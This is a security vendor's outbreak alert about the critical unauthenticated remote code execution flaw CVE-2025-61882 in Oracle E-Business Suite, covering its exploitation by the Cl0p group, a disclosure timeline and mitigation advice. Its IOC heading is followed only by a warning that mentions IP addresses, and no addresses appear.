ICS Labs Outbreak Alert - Oracle EBS Critical Vulnerability (CVE 2025-61882)

Oracle EBS (E-Business Suite) is warning about a critical vulnerability identified as CVE-2025-61882, rated critical (CVSS 9.8), which specifically affects the Concurrent Processing component integrated with BI Publisher in versions 12.2.3 through 12.2.14. This vulnerability allows remote code execution (RCE) without authentication, enabling an attacker to exploit the system via HTTP requests with minimal technical effort and obtain full control of the affected server.

Active Exploitation and Real Threat:

Recent reports indicate that exploitation began quietly in August but escalated in September, with multiple organizations reporting severe incidents. There is evidence that this vulnerability is being actively exploited by the ransomware group Cl0p, which is well known for data extortion attacks. In corporate environments running internet-exposed Oracle EBS, the risk of compromise is high and can result in data exfiltration, lateral movement, and disruption of critical business processes.

CVE Timeline:

04 October 2025: Disclosure and Critical Rating

• Oracle Alert: Oracle issues the first security advisory, acknowledging the vulnerability.

• NVD Publication: The U.S. National Vulnerability Database (NVD) publishes the initial CVE details.

• Severity Escalation: Within hours, the vulnerability is rated with a CVSS score of 9.8, indicating maximum criticality.

  
  

05 October 2025: CVE Registration Formalized

• CVE Registration: The NVD receives and formalizes the CVE record submitted by Oracle.

  
  

06 October 2025: Confirmation of Active Exploitation

• NCSC Advisory: The United Kingdom’s National Cyber Security Centre (NCSC) issues a formal advisory that the vulnerability is being actively exploited by malicious actors.

• Inclusion in CISA Catalog: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds CVE-2025-61882 to its “Known Exploited Vulnerabilities Catalog.” This action signals an imminent and confirmed risk to organizations.

  
  

Recommendations:

Oracle released an emergency patch this month; however, its application requires the October 2023 Critical Patch Update to be installed beforehand, which is an obstacle for organizations that do not keep their environments up to date. While the patch is not yet applied, it is recommended to restrict system access via firewall, implement specific rules in Web Application Firewalls (WAFs), and increase server monitoring. Complete mitigation requires architectural review, network segmentation, and continuous monitoring to detect potential compromise. CVE-2025-61882 is more than a technical vulnerability it is a warning about the risks of neglecting maintenance of critical systems. Rapid response is essential to protect corporate assets and ensure business continuity. Security teams should prioritize investigation of indicators of compromise and reinforce their defense strategies.

IOCs:

Warning: The IP addresses listed above may still be active. Exercise caution when handling them and do not access them directly to avoid exposure to malicious content.